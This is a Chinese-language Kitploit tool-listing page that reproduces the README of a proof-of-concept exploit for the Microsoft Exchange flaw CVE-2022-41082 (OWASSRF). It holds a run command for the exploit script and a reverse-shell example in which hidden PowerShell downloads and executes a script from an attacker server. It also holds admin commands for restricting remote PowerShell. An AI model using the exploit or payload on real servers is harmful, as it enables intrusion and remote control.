Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-41082 — CVE-2022-41082-poc | Kitploit
工具/GitHubGitHub/soltanali0/cve-2022-41082
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制远程访问工具
GitHubsoltanali0/cve-2022-41082

CVE-2022-41082

CVE-2022-41082-poc

查看仓库
311年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-41082

此仓库包含一个概念验证(PoC)工具,用于利用 Microsoft Exchange 服务器中的 OWASSRF 漏洞(CVE-2022-41082)。该漏洞利用允许攻击者在服务器上执行任意命令,可能危及系统安全。

概述

该工具利用 OWASSRF 漏洞绕过身份验证,并在 Exchange 服务器上获得远程代码执行(RCE)能力。通过利用此漏洞,攻击者可以像已认证用户一样执行命令,从而导致严重的安全后果。

工作原理

  1. 身份验证绕过:该工具连接到目标 Exchange 服务器,利用精心构造的请求绕过身份验证机制。
  2. 远程代码执行:成功登录后,该工具打开一个会话,允许在 Exchange 服务器上执行命令。
  3. 执行命令:用户可以指定要在服务器上执行的命令,从而执行各种操作,包括文件操作、网络操作或建立反向 Shell。

重要提示

使用此工具时,请确保保持相同的 Exchange 管理 Shell 会话打开。关键是在为其他用户禁用远程 PowerShell 访问后,至少为一个用户启用该访问。否则,您可能会失去所有 Exchange 服务器的管理 Shell 访问权限。

管理 PowerShell 访问的命令

以下是一些有用的 PowerShell 命令,用于检查和管理谁有访问权限:

检查 PowerShell 访问

要查看哪些用户拥有远程 PowerShell 访问权限,哪些没有,请运行:

root@kitploit:~
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $false'

禁用所有用户的 PowerShell 访问

**警告:**除非重新添加至少一个用户,否则小心不要关闭 Exchange 管理 Shell 窗口。

您可以使用以下命令禁用所有用户的 PowerShell 访问:

root@kitploit:~
$user = Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
$user | foreach {Set-User -Identity $_ -RemotePowerShellEnabled $false}

或者使用单个命令达到相同效果:

root@kitploit:~
Get-User -ResultSize Unlimited | Set-User -RemotePowerShellEnabled $false

为特定用户重新启用访问

要为特定用户授予远程 PowerShell 访问权限,请运行:

root@kitploit:~
Set-User "guest" -RemotePowerShellEnabled $true

失去 PowerShell 访问的解决方法

如果您失去了所有用户的 PowerShell 访问权限,您可以创建一个具有管理员权限的新邮箱用户。此新用户将绕过已应用的策略,使您能够再次使用 Exchange 管理 Shell。

使用 PoC 工具

要求

  • Python 3.x
  • 必需的库(必要时通过 pip 安装)

运行工具

要执行 PoC 工具,请运行以下命令:

root@kitploit:~
python3 poc.py -H <target_IP> -u <username> -p <password> -c <command_file>

将 <target_IP>、<username>、<password> 和 <command_file> 替换为您的具体值。

反向 Shell 示例命令

您可以修改 cmd_file 中的命令以包含反向 Shell 有效载荷。例如:

root@kitploit:~
powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('http://your-malicious-server.com/reverse.ps1')"

该命令将从您的服务器下载并执行 PowerShell 脚本,为您提供反向 Shell。

参考

有关 OWASSRF 漏洞和 PoC 代码的更多信息,请访问以下链接:OWASSRF CVE-2022-41082 PoC 和 https://www.youtube.com/watch?v=c2DZYP6jc7g

下载工具